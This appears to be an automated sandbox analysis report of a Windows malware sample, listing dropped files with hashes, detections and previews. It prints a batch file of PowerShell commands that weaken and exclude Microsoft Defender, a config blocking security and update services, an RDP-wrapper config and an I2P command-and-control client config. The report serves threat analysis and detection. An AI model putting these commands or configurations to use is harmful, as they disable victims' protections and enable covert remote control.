SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\file.exe
File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):10639360
Entropy (8bit):7.4147455331909855
Encrypted:false
SSDEEP:196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
MD5:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
SHA1:C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
SHA-256:44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
SHA-512:B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 19%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3744
Entropy (8bit):5.500846542160262
Encrypted:false
SSDEEP:96:isYJ9VrDT0HU0Hn0H1w00Hu0H+kQHR3+PfJG0HNVHHH10HltHq:DiTfT000H0i00O0TQxOPfJG0tVnV0FtK
MD5:712B52B3E0DDCB64F7B21B30D0AD4AC2
SHA1:FA4E676AD558E0936F9E985F4674AB743A13D2E2
SHA-256:47C1C9430A47AE1F16695334DAC848C3D167CA7BCD14B3543302971AB59BEA0C
SHA-512:02077947D8C2D4713016A684C7525F93B13BA3AC1F1C987FC230EE04347C94B0A333CC741D92D5E8E67264F07D75F460EECFD20167D56A0DB2EF049D5FFC5E66
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10
Process:C:\Users\user\Desktop\file.exe
File Type:DOS batch file, ASCII text
Category:dropped
Size (bytes):259
Entropy (8bit):4.933902901538645
Encrypted:false
SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:261A842203ADB67547C83DE132C7A076
SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:true
Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
Process:C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
File Type:Generic INItialization configuration [svc]
Category:dropped
Size (bytes):195
Entropy (8bit):4.692426693515089
Encrypted:false
SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
MD5:E025B58CB2D118FAFAE00850EE91C5F9
SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
Malicious:false
Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
Process:C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):21487
Entropy (8bit):5.069729499027424
Encrypted:false
SSDEEP:384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888A4:ubbEbNQ6s69WS8vv88o888888888888J
MD5:D9295B7BE0DAF6EA62B8603BC4415FD6
SHA1:AC44C082D9349177D1E1D4DEF4D5901A99547D91
SHA-256:F4B9A62A7288AB1436977C58A8CB7A550EAD84DF8DCE2591FCB87C2DDF59F7B4
SHA-512:7C76DFB991C172557A6F4559F194276263CEFA6BF838FFA12E27BC67A7B59345CF956552A89F040465EDB009E89E6E84C4BD4A0FF6A39BDE9431B0C5887E77FB
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):115712
Entropy (8bit):6.277217301921545
Encrypted:false
SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:D0F0423AEEE6B6FF6754D860603D46D0
SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):104448
Entropy (8bit):6.259370376612282
Encrypted:false
SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:7A8E8A0842D8D65713DEE5393E806755
SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):37376
Entropy (8bit):5.7181012847214445
Encrypted:false
SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:Generic INItialization configuration [SLPolicy]
Category:dropped
Size (bytes):441513
Entropy (8bit):5.449545529389614
Encrypted:false
SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:false
Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):129024
Entropy (8bit):6.313152038164236
Encrypted:false
SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:C89542ABA45CE1084760AE8DE6EAE09E
SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):105984
Entropy (8bit):6.2884725801282775
Encrypted:false
SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:91A0DD29773FBFB7112C5FCFF1873C13
SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:Generic INItialization configuration [cnccli]
Category:dropped
Size (bytes):214
Entropy (8bit):5.0997449470012635
Encrypted:false
SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:26702FAAB91B6B144715714A96728F39
SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:false
Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):92672
Entropy (8bit):6.242846530333761
Encrypted:false
SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:FDCF93ACD089B505B524DDFA0FF947F9
SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):91136
Entropy (8bit):6.2290767543196575
Encrypted:false
SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:4C086C8F48C4D0F8C20410E60340AEC9
SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text
Category:dropped
Size (bytes):8568
Entropy (8bit):4.958673415285098
Encrypted:false
SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:27535CEE6740DFC50A78A0322415E67C
SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:false
Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):62449
Entropy (8bit):7.807149241969407
Encrypted:false
SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:688FDFAE15F328A84E8F19F8F4193AF2
SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:false
Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):9146880
Entropy (8bit):6.674868432808522
Encrypted:false
SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:676064A5CC4729E609539F9C9BD9D427
SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):115200
Entropy (8bit):6.220212606349767
Encrypted:false
SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):6.081768116226836
TrID:
  • Win64 Executable GUI (202006/5) 92.64%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • VXD Driver (31/22) 0.01%
File name:file.exe
File size:11'950'592 bytes
MD5:54a1448df6e33d7032232dd1d896bc68
SHA1:8ed1df1c308956143e79adf5732e2d6204faf58a
SHA256:075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4
SHA512:918f0e7252ab5f6b1b576060c67ecaa185e4616ed88bf02e04c578559179897876f4c6b1b413c727189ea53846accfc966a25f75e0b20400fb1c1c0db30127d6
SSDEEP:98304:FdwqvpPlIpF6+2UT0lursS0lU7h6bBZdQI:PwqhPlIp12C0luoU7h
TLSH:1FC65B7F76A18629C22EC23AC0A38F04E93370BD1733C6E793A45169DF599D45E3E624
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
Icon Hash:1f6c6cececf16117
Entrypoint:0xcb1f90
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:0x66F18B15 [Mon Sep 23 15:36:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:2
File Version Major:5
File Version Minor:2
Subsystem Version Major:5
Subsystem Version Minor:2
Import Hash:266fe50b75556d32a77ba4347fd8a6b3
Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFE9B08h]
call 00007FB5485CD330h
dec eax
mov eax, dword ptr [000BB09Ch]
dec eax
mov ecx, dword ptr [eax]
call 00007FB54888B381h
dec eax
mov eax, dword ptr [000BB08Dh]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007FB54888E030h
dec eax
mov eax, dword ptr [000BB07Ch]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFE939Ah]
dec esp
mov eax, dword ptr [000BB77Bh]
call 00007FB54888B383h
dec eax
mov eax, dword ptr [000BB05Fh]
dec eax
mov ecx, dword ptr [eax]
call 00007FB54888B594h
call 00007FB5485C4D5Fh
jmp 00007FB548E671BAh
nop
nop
call 00007FB5485C4F56h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007FB5485C44ECh
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x99e0000x9d.edata
